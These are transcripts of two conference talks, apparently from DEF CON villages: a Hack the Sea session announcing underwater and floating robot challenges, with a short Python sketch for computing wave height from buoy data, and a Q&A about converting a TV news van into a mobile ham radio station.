you'll have a hell of a time getting it here. So, checked luggage or carry on luggage and we'll be more specific about dimensions going on going forward. I can automatically tell that some of you are going to want to know can it fit in checked luggage and then I can unfold it. Probably, but we'll figure it out. Ideally, your bot is going to be untethered for power. We can talk later about whether or not you can do a glider motion, which is your bot can be underwater and then come up for comms and then go back down again. That's a valid design. We'll think about it. And again, we'll have clear guidelines here going forward. We're thinking no more than $1,000 expenditures. So for those of you who are in makerspaces, if you want to put a team together and start thinking about how to build this, we really don't want you to be buying the Gucci set. Like, cobble this together, make it work, but do it the hard way. 
And we're looking forward to seeing what you come up with. Like I said, reach out to me or reach out to Hack the Sea. We're at hackthesea.org, and we will have, in the coming weeks, the exact specifications and the gateways and challenges to get us moving forward. And if you have any other questions, I'm here, but at this point, I'm going to kick it over to Grant, hopefully, and Grant will talk about the floater class. Hello. How are you? All right. Very excited to be here. My name is Grant from Ocean Builders. We are seasteaders. We are the ones that are famous for building a floating home in the water in Thailand. Let me see if I can share my screen here. Maybe that's not working. Okay, maybe I can't share my screen. Can you hear me okay? Okay. Now something went wrong. Okay, there it is. Okay, so maybe I can't share my screen. I was going to show you some images of the original seastead that we built in Thailand, the one that was very famously attacked by the Thai Navy and ended up turning into a 10-day manhunt by the Thai Navy. There's a very interesting story there; right now a book is being written about it as well as a screenplay for a movie, so I'll talk more about that in my official talk tomorrow. But I wanted to talk here about the challenge we're going to be doing for a floater. And for seasteading, something that's really important for us is to be able to have advance warning if there's big waves, or to see what's actually going on in the area around us. So we would like to have some notice that there's big storms coming up and things like that. And also another purpose is to be able to observe the marine ecosystem around us. So we want to build what we call an Aquaboy — not a boy like a man, but a buoy, like the actual buoys that float in the water — and fill it with as many sensors as possible that can give us very useful information. So useful information can be water temperature, pH levels, salinity, turbidity, maybe even cameras connected to collect some data, or maybe even have machine learning. So we'll be putting together the specifications on exactly what all the details are. We already have a bit of a cheat sheet pinned on our channel, so you can go and download what we have already. It's already there. And we'll just give you some information on the ideas that we have for what that is, and we'll revise that as we go along here. But we're pretty close to what we want for the specifications of what would be there. Ideally, we would have a maximum price and size, of course. It should be something you should be able to bring to Vegas — like Nina was saying, you should be able to transport it there. Otherwise, it doesn't make sense. And it could look something like a normal buoy that you see floating in the water, kind of like the red and green buoys that you see giving direction for boats to navigate through some waterways. It could be very similar to those in shape, and it can take readings under the water; there would be a sensor array above the water, and there can be sensors underneath as well. So it's really unfortunate I can't share my screen, but I'll maybe have that solved for the next talk tomorrow, and so I can go through a few of the details there that we had. There's also a link to join the challenge. So if anyone here wants to look at the challenge, or look at some of the challenges we have that we're going to be doing over the next year, there's a link to a little survey sign-up form where you can actually put your name and information and kind of check off what your interests are. 
And I think we have something very unique because we are like this is hack the sea. Everyone's here to find out how to hack the sea. And this is, I think, a really interesting opportunity. We're at the time where all these technologies now exist for us to be able to do some really fantastic things on the ocean. And so we're out there doing it. We're C-STETers. We're actually building hardware. We're actually making things happen. And people have been talking about building a city on the sea for decades, but no one's actually done it. So we're actually the first ones that are actually putting hardware together and putting it in the water. So we're really excited about being able to reach people and reach out to a community of hackers that likes building things and is passionate about building things and can help us to move everything forward. We're really looking for kind of here. We're here mostly to do a call of action to say, okay, here's the opportunities. The sea is wide open with all these incredible opportunities of what we can do. And I think now is a really amazing time to actually bring all these things together, do a call of action here to anyone that wants to participate and help us do some really interesting things. So we'll give a longer talk tomorrow. I'll have some videos and presentations around the whole thing. But I think we can probably pass it along to back to Nina, who's going to patch through with Dave on the phone. Thanks a lot, Grant. Yep. So we got Dave on the phone. I do want to say just as an addition to Grant's commentary here, we aren't looking to have people bring their proprietary. Source stuff right to the to the battle. These we're looking for open source hardware and software on this one right want to be able to share. That's the way that works. And so look for that to be a requirement in in in the in the battle guidelines. And so alright, so this is awkward as hell, but I'm going to have Dave speak to you about the underwater IOT via my phone. So I'm just going to I'm going to look to Grant to give me the thumbs up to see if he can hear Dave Dave take it away. Okay, can you hear me? I get too much feedback here. So I'm kind of flying blind here. I'll do the best that I can. So I'm kind of flipping through my PowerPoint here. I didn't actually hear Nina's video so I don't really know what she covered in terms of UVBs. But you know just to sort of put things in context, I guess. You know, these basically unmanned undersea vehicles and you know, Dave, I'm going to catch up. Stand by one. I'm going to catch up. We're getting way too much echo. Here's what I'm going to do. I think what we're going to do is we will tip pocket to the whole world now. We're going to we may try and ask you to dial in tomorrow and see if we can get you human plus status. So for the for the universe out there. Unfortunately, Dave does not have human plus status and so the video and audio functions aren't working. And so we'll have him prezzo out probably following Grant tomorrow but we'll see if we can spin up in the meantime I'm going to take some questions. I'll just gain it and I'll see if I can grab Dave's slides but but just yeah and then and then just as a takeaway the the the undersea IOT stuff is actually really getting built out pretty aggressively Dave what's the timeline you figure. Within the next 10 years he's next five or 10 years. That's the critical path. As things progress with communications in the undersea. That's the critical path. 
Okay, Dave we're going to we're going to have you we're going to have you. We're going to get you added to tomorrow's jam so I'll do that in the back and let me just take you in a now so we'll talk to you in a couple minutes Dave thanks so much for we'll get there. Thanks for coming in. Alright great if you want to, if you want to unmute, then we'll just take whatever questions come up, or we can just riff until then. Well I'm really excited to hear about the underwater IOT from Dave. I wanted to hear it. So let's why don't you and I talk about why don't you and I talk about like why does it what's what's so hard about you UVs like what why does that. We have plenty of flying drones like what's the what's the special challenge about about being under the water, and you can talk about this in the sea setting perspective, and I can talk about from the naval perspective but I'll kick it off to you first. Well it's communication getting the data from whatever is when you're underwater you can't send a radio signal above you know it doesn't doesn't travel so that's the that's the core problem so if we. You know, if we can solve that, or if there's a solution or some way of communicating that would be that would be incredible that could be a game changer. So I mean I think this is I mean this this can't be stressed strongly enough when I've been talking to roboticists who do undersea stuff. One of the core challenges and why they're people are talking about going autonomous with their robots is this problem of communication so for those folks who don't play around in the water stuff radio frequency, the way in which comes work wireless comms. You know the way in which our drones fly. That is not a thing you get to do under the water, you're left with two sources of signals under the water, unless you count Dave's undersea IOT, but you're really looking at light and so on our grant do you know any other ways besides light and so on our sound and light. No. Yeah, I'm not either so I'm curious to see what Dave has to see about an undersea IOT. But, but really so now you're talking about a bot that is either working on delayed comms, or if you're going to do light you got to worry about some other problems and so there also additional issues which is the bathymetry of the water so how deep is it you get different pressure the farther you go down you get different resistance on the on the hull itself. Great. Are you familiar at all what happens when you put lithium ion battery encased in a small shell and put it underwater. No, I haven't. I haven't really researched much on and if the battery off gases what do you have then you have a you have a pipe. So, the other problem we're going to deal with in that in that UV category is power. And so I this is a very serious issue that even if you get a really good lithium ion battery in that in that bot and it's operating autonomously underwater. Now you have to worry about whether or not it that the encasement the shell it's right is secure enough so to so as to prevent a serious problem with that. The other way you could do it is you could try and create some floater that follows along but again this is really up to the hackers to figure out but but we're really going to try and push you guys on the edges of how much power can you pack into one of those things and make it operate on tethered and how are you going to get to communicate. And by the way, if you get really smart ways to communicate. 
I'm just assuming other people are going to be messing with you too. I could be wrong about that, but I'm guessing they're gonna. So the undersea problem is a real one. The other problem that we're talking about for swimmers is orientation. So for bottom-crawling bots, they've got the ground they can orient to, right, so now they're left with four directions: forward, back, left and right. So similarly for floaters, you're going to be on the water surface: forward, back, left and right. But if you're a swimmer, you have two more dimensions to worry about, and that's up and down. So if you're thinking about trying to orient yourself in the water, not only do you have to figure out where you are with no real touch points, but you've got six directions to worry about. Again, I don't know how our hackers are going to deal with it. I don't know what they're going to do to solve that problem, but I'm crossing my fingers for them. Great. Do you want to talk about the floater class? Yes, so actually, now that you're mentioning it, I talked with Brian about a number of different possible ideas and challenges. And we talked about having a stationary buoy that collects sensor data. And then we also talked about having a robo-boat, basically a robot boat that moves around. And so for the floater, are we talking about the moving version or the stationary one? Whichever one you're thinking about, I mean, this is for you guys to build out. Good luck. All right. Yeah, okay. So then I think the simplest and probably the best thing to start with would be the stationary one that's going to stay in one place. That technology is really critical for us, because we would really like to know what the conditions are in our area and be able to put those stations in remote areas and collect data before we even decide to ever go there. So we can actually be collecting data and see what the conditions are year-round, and if it's a hospitable place to put a seastead. So it'll just be there collecting data, maybe for a year, before we would actually move there. Like, it would collect wave height data. So we'd actually be able to collect the data on whether the buoy was going up and down, and what the rate of going up and down is. So we'll be able to see what kind of waves we have, if we have really crazy, out-of-control waves or if we have slow and steady, very calm conditions that you'd actually want to live in, because living in big waves is not necessarily fun to do. We've actually engineered the homes so they float above the water. So we're suspended on a pole that is about two and a half meters above the wave area. So that makes us very comfortable, but still, when the conditions are really wavy, then it's still not nice to live in. So being able to collect all that data in advance is really good. And we also really want to have clear data that can show the current state of the environment before we put a seastead in that area. Because we don't want to, three years from now, cause any kind of damage to the local marine environment. We want to make sure that our homes, we're actually engineering them so that they can be eco-restorative and not damaging. So for that, the more clear data we get as a reference, then that really helps us out a lot. 
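As a sketch of how a buoy like that could turn its up-and-down motion into wave numbers, one common approach is zero-upcrossing analysis on the heave signal: count each crossing of mean sea level as one wave, take crest-to-trough heights, and report the mean of the highest third as significant wave height. Everything below (the sample rate, the window, the function names) is an illustrative assumption, not anything Ocean Builders has specified.

```python
# Sketch: significant wave height and mean period from buoy heave samples.
# `heave` is assumed to be vertical displacement in metres at a fixed sample rate,
# e.g. produced by an IMU/accelerometer pipeline on the buoy; names are hypothetical.

def wave_stats(heave, sample_rate_hz):
    mean = sum(heave) / len(heave)
    samples = [h - mean for h in heave]              # work relative to mean sea level

    # Zero up-crossings: points where the signal goes from below to above the mean.
    ups = [i for i in range(1, len(samples)) if samples[i - 1] < 0 <= samples[i]]
    if len(ups) < 2:
        return None                                  # not enough waves in this window

    heights = []
    for start, end in zip(ups, ups[1:]):             # one "wave" per up-crossing interval
        crest, trough = max(samples[start:end]), min(samples[start:end])
        heights.append(crest - trough)

    heights.sort(reverse=True)
    top_third = heights[: max(1, len(heights) // 3)]
    significant_height = sum(top_third) / len(top_third)   # mean of the highest third
    mean_period = (ups[-1] - ups[0]) / sample_rate_hz / (len(ups) - 1)
    return significant_height, mean_period

# Example: analyse a 10-minute window sampled at 5 Hz
# hs, t_mean = wave_stats(heave_window, sample_rate_hz=5)
```

Wave direction is harder and usually needs pitch and roll (or an array of sensors) on top of heave, which is why it comes up as an open question later in the discussion.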
Grant, I have a question from the audience, but I wanted to do just a follow on question to what you're talking about, which is, is there a specific sort of climate to logical limit to where you're C setting what I mean is there. You were talking about Thailand, which is a pretty tremendous space, but are there places where you're like this is just a terrible idea or the technology is not there yet. Is there an optimal zone for C setting. Yes, there is. We are in Panama right now and that is pretty much the optimal location to start. Because Panama is outside of the hurricane zone. There's a, I guess, 700 or 800 kilometer band around the center of the earth around the equator, where you don't have hurricanes, just because the way the Coriolis effect of the earth works, if you just can't get hurricanes in that area. So that's an ideal place to start because we don't have to worry about moving our home every year when the hurricane season starts again. So that's an ideal area. Obviously, a lot of people like being in warm tropical, beautiful areas and Panama has a lot of beautiful untouched green. Jungly areas that are beautiful and having your C step close to land. So you have beautiful view of the mountains and the greenery is. It's really nice. So that kind of environment is really ideal versus putting it in the North Sea in the Arctic somewhere or someplace really cold with 100 foot waves. That's definitely someplace you don't want to be. We can engineer them for. Different conditions like our, our base of our C step is actually built in the same base as a, like an oil rig. So we have these deep spars, which are poles that go deep into the water that have that create the buoyancy and then you have very heavy weight far below them below the spar. And that gives you a lot of stability. So we have buoyancy as well stability and then we can just scale that up to something the size of an oil rig, which can be in pretty nasty conditions, but we, it's probably someplace you don't want to live. Okay, so the question that came in is, is that do we see. Are we aware of rovers or bots that use VR virtual reality vision navigation or virtual reality vision for for operators using advantage in that or more traditional methods of computer vision more useful. So this is a question about how the bot understands the environment that it's in grant you have any early thoughts on that and then I will I will dial through my mental Rolodex and try and remember a time for the Navy go ahead. I think that would be the ideal condition for us to have as far as giving people a really good idea of what living on the water can be like, but actually like being able to have them either remotely or on site where they can actually put on a headset and like swim through the water and see underneath the water and see what's going on. If we could give that kind of experience to people either remotely or on site that they could actually experience it in that way that would give an dimension that people haven't really had before, and to be super interactive and be able to explore the area and so from a tourist kind of point of view or to get people kind of introduced to this whole new way of living and being which is totally for under most people living on the ocean that's, that's a big step for most people but if you can kind of have those baby steps to give them a vision of some pretty incredible sites that you wouldn't normally see that would be really, really fantastic. 
Yeah, so Grant I agree like I think I think really is particularly for tourism. Getting people to sort of buy in and understand what it's like to be down there. I mean there's something. We are human right there's something compelling we are sense animals and if you can get more sense that a human can understand down there that's that is super helpful I will admit that to my knowledge Navy who is not particularly interested in human sense but is more interested in you know sort of targeting fixing tracking that their, their challenge set is already super hard. So for instance, so if you're if you're a big Navy asset and somebody's fired something at you from far far away under the water. Like, your, your biggest concern is by the time you figured out where it is. If it has any self guiding capabilities, then you're going to try and counterfeit that gets military really fast. You're going to try and counterfire but you have to try and guess where it's going to be. And so that's that's so a lot of that stuff isn't really VR relevant Navy is really thinking about how do I stop someone from hitting me really 99% of Navy's how do I avoid getting struck by something. And so, you know so but I love I love the question about VR because I think it makes me think that we're not thinking broadly enough in the Navy about the way to onboard these new capabilities grant I have another question for you if you don't mind. Right, so it says, do the homes have any built in capability to collect data from the environment around them so like not just sort of like something you, but like in and of itself built into the infrastructure of the of the sea said so. Yes, we're building as many sensors as we can into homes to make them really, we want to make them smartest home on the sea. Well, they will be because there's not a lot of smart, really smart homes on the sea because we're the only ones building. So, first level, we have a weather sensor that's on the roof that detects lightning strikes and detects UV, the wind direction and a whole host of data humidity temperature and parameter pressure and so there's there's a long list of things that it collects right from there. So, we will have sensors inside that will detect movement, because we want to be able to chart what what the movements like if we are getting, and say if you're if you're away from your home for a while and then your home starts moving around for some reason, we would like to be able to give you an alert to make a big storm coming and you can call your neighbor and ask him to close the doors or something or close the windows or, you know, whatever, or you can just do it remotely from your from your handheld from your phone. So, we're building a lot of sensors like that. I mean, there's, you know, there's going to be standard sensors, but environmental sensors will have as many as we can we would like to be able to detect the temperature of the water at different levels, going down. We would like to be able to turn each home basically into research station and document the environment the green environment ran, because we're not we're not just trying to make homes on the water we're trying to make homes that are a positive contribution to the environment. So, part of doing that is to be able to assess what the environment is like, and if we're improving it or not improving it so we want to measure the turbidity the alkalinity the pH and same thing. 
And other factors so we can we can see if there's more life after they've our homes have been in the water for for a couple years or a couple months or whatever when we had our home in Thailand after only two months of being in the water. It went from being like a desert basically under water which most of the water, most of the ocean is a desert. And when you get far away from the coast, and we're 13 miles away from the coast so in that case, after two months, we went from having nothing around to having thousands and thousands of fish. So, we like having that kind of success story and we'd like to be able to reproduce that so we're going to try to use sensors to collect as much data as you can. I mean, so the I so sorry, I don't want to make this super military but please forgive me grant, it's, you know, I have to translate for the war types of us out here. So you're talking about an ISR environment and we're all that data is going and I wonder what so from a person who doesn't want everything to be about the military, but knows. Once the military gets a hold of something, they're going to make it about the military. It's just it's it's a it's a it's an interesting side effect of that mindset. Do you have any security concerns about the data that you're collecting being used against the countries where your homesteads are. That's terrible. I'm super sorry I had to ask it I'm sorry. Yeah, no security. Come on. Yeah. Well, that's why I already spoke with Brian a couple, maybe a week ago, go about having all of our systems have security threat analysis done on on even each of our sensors. All the hardware we're going to be using all of our systems, and then just have people try to hack it and see what they can come up with and try to patch as many of those things as possible. So we're going to what we want to do is to be able to have all this data and you can you can get your cstead and not put all the stuff in it but I would like to be able to collect data. And we can, as if you're an owner of the cstead you can have the option of having that data where that's available to you and only you and that's encrypted. And you own you're the only one that has access to it and we'll probably put it on a blockchain or whatever makes sense to. And then you can release the data if you want to share that with anyone else. If you want to share it with, like you can share it with just yourself you can share it publicly or you could share it just with like a management company that can see. Okay, that the sensor at your house is showing that your water levels are getting really low and you need to replace your something on your on your home, because it's at a critical level, or if your battery levels too low and your, your power systems are going to continue and you're away then then we can come and help you know take care of that our management company can come in and take care of that so so there has to be I think different permission levels for what where your data is going to go and there has to be really good testing to make sure hackers have a hard time getting in as hard as possible. Yeah, no that's I mean it's, it's interesting as we live in an era where seemingly innocuous information seemingly right I mean this is the big debate not to not to go super meta. But this is the big debate about like what's the harm in tick tock right like what is the harm in. We're not just a company, but we can also say a country right, both can can be equally evil. 
What is the harm in all of this seemingly innocuous data being built up and so not to, and honestly, everybody should tune in tomorrow for for grants specifically but just to sort of open, open the door a little bit. What kinds of, what kinds of concerns do you have about big data that like that you're collecting like what have you have you thought through what someone might use that stuff for I'm an optimist so I always look at as much I always look towards the positive so I'm looking at what amazing things we can do because I, I genuinely I'm not doing this because I need to do another project. I'm not doing this because I love doing this and I want to do something that I think we can. I think when we build, when we build homes on land we kind of destroy the land and you know clear cut the forest and that's not, you know, it's not a good, we're not being a good citizen of the planet. That's what I saw last year in Thailand with so much life. All of a sudden just appearing after just two months that gives us an opportunity to actually be a good citizen of the planet. So I'd like to, I see this as I always look at the ways of making an impact to the situation and I think we can use data to help improve the restoration of coral reefs in the world. And so I'm going to, I'm going to plus up because there's a question that's come through a little bit further about the telemetry data that you could collect passively from these people and I'm going to ask it specifically because folks are asking and then I realized we're going to run out of time here in about 14 minutes but and you and I will, we'll again talk through and invite people to join us in next year's bot challenge. But the question, again, is are you guys thinking about this from an educational standpoint like this, the data you're collecting doesn't I mean it you guys are looking to benefit the environment directly. But I mean, is there like, is there some sort of partnership or subsidies like educational institutes like are you trying to partner to try in and and make all of this telemetry have effects beyond just the sea setting element. So two weeks ago we started reaching out to people that we could partner with. I basically have 150 projects, like huge projects going on simultaneously so, and it's all filtering through me at the moment. That's how we know you're a hacker. Go ahead. So I'm trying to bring more people on board to help distribute some of the research because there's just so much I can do. But I would. Yeah, there's there's there's a lot filtering through me right now so we need to get a better handle on that and then I think we'll be in a pretty good position to make. Do some really good things with the data. So, I guess, partners. There's a lot of people we could partner with and that's just another project to find the right partners and I haven't started to we have started to look. We started to reach out. Find the right people that would like to partner with us and we're open to, if anyone has any suggestions. I'm, I'm all yours. Just send it in the chat or on the C setting channel. Cool. Thank you so much. All right, so we're going to round us out. Actually strike pot is a question for us that I think we should probably address, or at least take seriously as we build out our guidelines. He wants to know to what degree. Our cuts products allowed so so consumer off the shelf products in building either your floater class or my swimmer class. 
Can we can we buy, you know, some local bot for 300 bucks and then just repurpose it and does that stay within our open source guidelines requirement. And I realize that we're asking on the fly because I know you and I were going to try and sit down together and noodle out exactly what kinds of limitations we want to slap on these folks for next year. But, but do you want to do you want to take a stab at cuts products. And, and then I'll, and then I'll, I'll give my preliminary thoughts on that. Yeah, I really want to have this done in the open source. And I guess if that interferes with that, then that's like kind of a kind of kills it. So if we have, if you have, if you're buying something off the shelf and then modifying everything on top of that, I don't think enough that that would give enough of open source component. Maybe if there's a consumer part that I don't know is maybe like, I don't know, an off the shelf robot arm or something that could be plugged into the whole system. And that wasn't an essential part of it then, then I guess that could be acceptable but if it's, if you're just modifying it off the shelf, aquatic drone and I don't, I don't think that would be like I think the guts the core guts of it are, are commercial then and closed source and I think that would be killer. I think, I think I agree again we're doing this on the fly as we dream this up. And I'm in before we wrap out I want I'm going to have grant remind us of what he thinks the the earliest and early speculation, what the floater class requirements are going to be and I know he's been working up a sheet on that. I'm inclined to say that if you want to use a COTS product for pricing components right so we have $1000 limit on the on the swimmer class. If you want to use a COTS product, you, you would at a minimum need to show me that it has been reverse engineered and that you are really economizing on costs, or, you know, private production of a servo, but, but you would at least have to prove to me that like no look it's been reverse engineered and those reversed engineered components are available open source, and so a person can sit down and say I am just cutting to the chase. And I think that's fair but you have to show me that it was that it was the case and I think that again, so for the, for the, for the swimmer class we're going to have some gates that people are going to have to go through throughout the year and make sure that by the time we get to the, to the pool in Las Vegas, we have got some, you know, no shit, seriously interesting bots, they might be dumb, right, they might be running into the wall repeatedly but then we've got some some bots that, you know, at a minimum like our full maker gear thought through and are going to behave in interesting ways that we had not anticipated. In part of the fun of the hacker space is just giving it a shot and seeing all the variation that emerges is one of the most beautiful parts of this community is that everybody's teaching us different ways to go at a question. So we're not trying to close that down. In fact, I'm trying to open it up. Which is why we don't want this to be about cuts right we don't want this to be about we want we want to want you to show us all the ways in which you're coming at, I don't want you to tether for power in a curiously interesting way. There's a lot of there's a lot of urine in Vegas pools maybe you can use that as a power source hard to say, but but you know sort of speculate and then think your way through it. 
If we have any luck. We will be able to secure a Las Vegas pool to do this in. And so, you know, really just trying to get a tan. And so that you don't die under the Vegas sun. And okay, so grant, I want you as we ramp out of the eight minutes left. Give me again just to recap for the folks. Give me the primary challenges the floater class are going to come up against one of the primary to be like this. I think this is really the issue. The big piece of it would be to be able to collect data and store it but also send it and sending a distance on the water could be could be a little bit tricky could be a little bit challenging. Because we may not have a station nearby where we can just we're just sitting there waiting for the data to come in. But to be useful, we have to be able to collect it. And some of these could be fairly remote in areas that are hard to get to so it would be very advantageous to have as long as the transmission period as possible I don't know how I will test that in Vegas. Good luck. Yeah, so maybe we'll have a team three miles away and seeing they can pick up the sensor data from the pool. That could that could possibly work. So that's going to be really important. Being able to check wave height is really important. Interesting. Yes, I'm sorry I haven't been thinking about surface vehicles. Oh, you're totally right. Okay, go on. Sorry. It didn't mean to drop. All right, go ahead. We would like to be able to know how how big the waves are what what the the period between the waves is. So, all that data is really useful. We'd like to find out if there's a way to find out the direction of the waves from sensors. And I was trying to figure out myself how how I would do that and I haven't put too much thought into it but I haven't come up with the solution on how to do that. Just with with sensors unless we brought AI or machine learning and had cameras to be able to do. I have so many ideas right now go on. Sorry. You know, you know, sorry, go ahead. Then. So, just standard. We can collect standard weather data as well. Probably we'd want to know lightning data as well if there's a lot of lightning strikes in that area. We might not love to be in that area if there's a lot of lightning and coming down in that area. So, that's a condition. You know, so we're going to see which are the most important items for us to have on this list as a final specification. Solar powered would be nice so they can last as long as possible and we don't have to go out and change the batteries every every week. If it could be continually charged that would be that would be ideal. So those are, I think some of the more important things. And of course, collecting any kind of water data we can like pH or salinity temperature. To busy cameras under the water that can identify fish with machine learning would be really cool as well. Oh, interesting. Wow. So that's so honestly that's, that's going to be VR right that is going to be I mean I don't, I don't think anyone's got it. I don't think anyone's got a massive database of fish signatures. I mean, maybe tuna. If you're lucky. Gosh, I don't yeah that's that's really interesting I hadn't thought about that before but yeah what does the fish look like and how is it not a plastic bag and interesting interesting okay. All right. So from a naval perspective, and you folks know me like I don't have to talk. 
I will talk from this perspective because I think it's different, because I think it's a complete contrast to what Grant's talking about, and I love it, I think it's fascinating, it's amazing, I think it's useful for the future. But in contrast, right, like what are some other kinds of challenges? So Grant's talking about survival of a floater, he's talking about persistence, he's talking about integrity of the data long enough that you can fetch it back, and I think that all those things also matter. When it comes to things like how does a navy project power, or at least protect vessels that are going along in the sea, like one of the issues at play for all navies, not just the US Navy, is how do we protect where so much of the world's commerce comes from. So for folks who don't know, right, all the items, probably the vast majority of items that you have running around in your house, come to you via a boat; they come by a ship, they float on the surface. And one of the things that navies and coast guards are required to do is ensure the safe passage of these objects, right, and if we're all impatient Amazon consumers, then we want it now. And so the question is, you know, how do you prevent those kinds of delays, how do you ensure freedom of navigation, freedom of the seas? So it's a navy question. For a navy, the biggest concerns are about the following things. The biggest concerns for the navy are: which of these, we call them white ships, white ships being ships that aren't out there with a military capacity, they're there to, you know, bring tourists around or they're there to move cargo from China to the US, right, this is white. So how do you tell the difference between white and other forces? How do you then, once you've identified these other elements that could be doing terrible things or might be trying to do terrible things, follow them in a meaningful way without having to send out a ship and literally follow it, right? And so really the question for the floater and swimmer classes for us is about locating something almost passively, right, from an ISR perspective, almost passively, just being able to sort of map who's who in the zoo and where are you heading this week. And honestly, Gary Kessler is going to talk to you folks actually in the next hour, I think, about hacking AIS, and AIS is the system by which all ships voluntarily share their tracking data as they transit the seas. And there's a real reason to be concerned about that system. And so we'll worry about that security in the next session. Anyway, so we're going to say goodbye because I think we're down to our last minute. I love you all. Talk to you all soon, and I'll miss you. Go ahead, Grant, say goodbye. Hi everyone. I look forward to seeing you tomorrow at my talk. I think it's at 10 o'clock in the morning. Thanks everybody. Bye.
|
40,000 Leagues UUV Death Match
|
10.5446/51645 (DOI)
|
Okay, it's time for the Q&A. Let's get some questions up there. I got Pete here in Discord, so let's give a hand to Pete. Get some questions going. Pete, do you got your webcam on there? Yeah, I'm getting a repeat of your voice about 3-4 seconds. Are you watching the stream live in the background? Yes, I should not. Correct, go ahead and mute that. Okie dokie. Ok, now that we got that, it looks like we got a question. What measurements or experiments were done to evaluate the RF hash of the boost converter? It wasn't very sophisticated when I first got it, which is no longer, by the way, no longer obtainable at that amperage. It's a shame the ham hoop built that died, but anyway, I just had it connected to a battery in my basement, and I did a before and after. So I had the radio running with it and without it before I started mounting it. That's a great question because it brings up a larger point that most regulators, power supplies, anything that has to do with changing voltage, they're almost all a terrible problem with RF hash. You have to assume that components like that are bad until proven good. So great question, a great thing to watch out for whenever you're doing anything with power supplies or changing voltages. Very nice. We got another question from the Twitch here. Let's see. ArmoredDKrab says, thanks so much for sharing. Curious if you worry about security of the van, what was the microwave rack for? Sounds like two different questions. So the security of the van, I assume you mean physical security. I am a little worried about it. I should have better protection for it. Now when it's stored long term, it's in a garage with cars that are much more expensive than this van is for car collectors. So I've got good security when it's stored, but yeah, I'm a little worried about it when it's parked at a hotel or even at home. I don't have a good answer for that and I should have a better answer. The microwave rack, that was just by chance that a guy in our club was retired from roving himself and sold me his entire collection of microwave van. So I wanted to get into microwaves at some point and I just took that opportunity, which happens a lot in radio. You have equipment available now that you think you might use in the future and it's at a great price and hey, get it now. You might save hundreds or in this case thousands of dollars in the future. I mean, that rack that I showed with the microwave capabilities, if I got new equipment there, you're looking at at least $15,000 and I didn't pay anything like that. I didn't pay five figures for that equipment. So it's not on the air yet, but it's there and ready to go when I get the lower bands ready. Very good. We got another question from Deadpixel in Discord. How do you deal with your van's total payload weight? Yeah, it must be heavy. Are you over with all that equipment? No, it's the total payload rate. There's a lot of special things about this van to package those with things like TV bands. They also have a lot in common with ambulances. Ambulances have a lot of heavy equipment with AC requirements. So I don't know what the number is. I think it's well over 9,000 pounds. And I assume that even with my heavy batteries, that the whole van weighs a lot less than it did when it was used in the TV van. Although I have to admit that engineering-wise, I didn't compare the weights or even measure how heavy it was. I made a guess when I registered the van and I made a guess that's 6,000 pounds. I think it's below that though. 
So good question, but I don't have a really good, satisfying answer. Yeah, it's definitely got to be a beefy van, right? We got another question in Discord. Testing2 asks, whether seals and grommets and water intrusion on an old van was the rubber all crumbling? How much of that did you need to refurbish to make the old ship sea-worthy again? No, I didn't have to replace anything yet. There was some water infiltration through the connection on the roof to the satellite antenna. Real early in the presentation, I showed my buddy lifting that satellite antenna off. So that had some water infiltration on it. I put a 4-3.5-inch cover on it and it hadn't been a problem since then. As far as the seals for other cables or even the doors, the only moderate problem was some of the seals for the doors were coming off. But they weren't dried out, so I didn't have a real problem there. Now, I haven't done a lot of cables that run to the outside, especially through the roof, so that is a concern when I do start wiring. That's one thing I should say that I'm not using a lot of... I got a screwdriver antenna on the back for HF, but I haven't done a lot of work with getting the VHF antennas out. That's obviously involved a lot more cables and ones that run through the roof instead of the floor, so I do it. I'm not going to watch out for that. Very good. Another question from Twitch here. CalvinLuck asks, those are such densely packed racks. Are you able to get access to most of the connections without fully disassembling it? Yeah, luckily... I'm going to take a step back. Part of what I wanted to do was make a little video tour of the van, but I ran out of time with the tropical storm that ran up the east coast. He said, Mike, excuse... it's a good excuse. It's true. Anyway, it's really good accessibility to the back of the racks. The first three racks that are together, there's a back door where you can get access to the AC panel that is played and the box for the generator, and there's like a storage area back there. It's pretty good accessibility. I think the only problem I have in the driver side and rack number three, it's hard to get access to the screws to put the rack equipment in that I mount from the rear. But other than that, it's pretty accessible. Now, obviously, if there's interior connections that I have to fix, the racks have to come out, or maybe at least the racks on top have to come out. Pretty good accessibility on both the front and the back. That's good. Nothing like taking a full day to take stuff apart just because you forgot something. Oh, yeah. Okay, we got another question in Discord from Bunzel. In addition to the van you showed us, or the van, do you have anything else for airflow or cooling to prevent hardware from overheating? No, and I do worry about that because it gets pretty darn hot in the van. It gets less hot than it did in my minivan because there's less glass to let sunlight through. I do have one other fan that I put in the back, so I opened the back door when it's particularly hot. I opened the back door and I have a van fan that's powered with 12 volts to get a little bit of airflow in. I'm kind of surprised at how hot it's been that none of the equipment has failed so far just because of heat. I don't know what to say. They work better than I would have expected, that I have any right to expect. There are physical opportunities in the back, I would suppose, to get even more fans going. 
But so far it has been an issue and I've activated on HF at least up to like a air temperature of 95 degrees outside. So far so good. That's a great point though, great question. And I don't know if you remember at the beginning of the presentation, I emphasized that I can't have the van engine on. I can't have the AC system on because of RF hash. So while I'm operating I can't have any air conditioning on as much as I would like to. Oh wow, that's a bummer. Yeah, especially if you came to DEF CON with that thing, it would definitely be a sweaty situation. Someone's asking, are you going to do a video tour of the van? I want to do this time, but ran out of time. It would be especially nice I think when I get antennas on it though, because it's kind of limited to just the interior. It's not too much to see. It would be nice to see it in operation I suppose. I'd like to make a video when it's more exciting, when I can show the pneumatic mass in operation and the rotator rotating. I hope I'll do that someday. Very good. Do we have any other questions on Twitch or Discord for Pete here? K-O-P-A-K on his ultimate van life van conversion. I'm not seeing anything yet. We'll give him just a few more seconds to throw a question out. Okay, looks like that's it for the Q&A. Well thanks Pete for the presentation. Maybe we'll see some demos or some other content maybe next year at DEF CON. Oh, that would be great. I hope we get him an opportunity to get together live. Thanks for being a great host and holding my hand through this 62 year old getting used to Discord and Twitch and all the other stuff at one time was kind of overwhelming. You guys did a great job. Thank you. Thank you and we'll see everybody for the next presentation. Next up we have K8AMH with the National Traffic System and Radiograms. That will be coming up in about 20 minutes. We'll get going on that and we'll see you guys shortly. Thanks Pete. You're welcome. Thanks for watching.
|
Come see how Pete (K0BAK) is converting an old TV news station van, the kind used to produce and relay live TV reporting, into a mobile ham radio station!
|
10.5446/51646 (DOI)
|
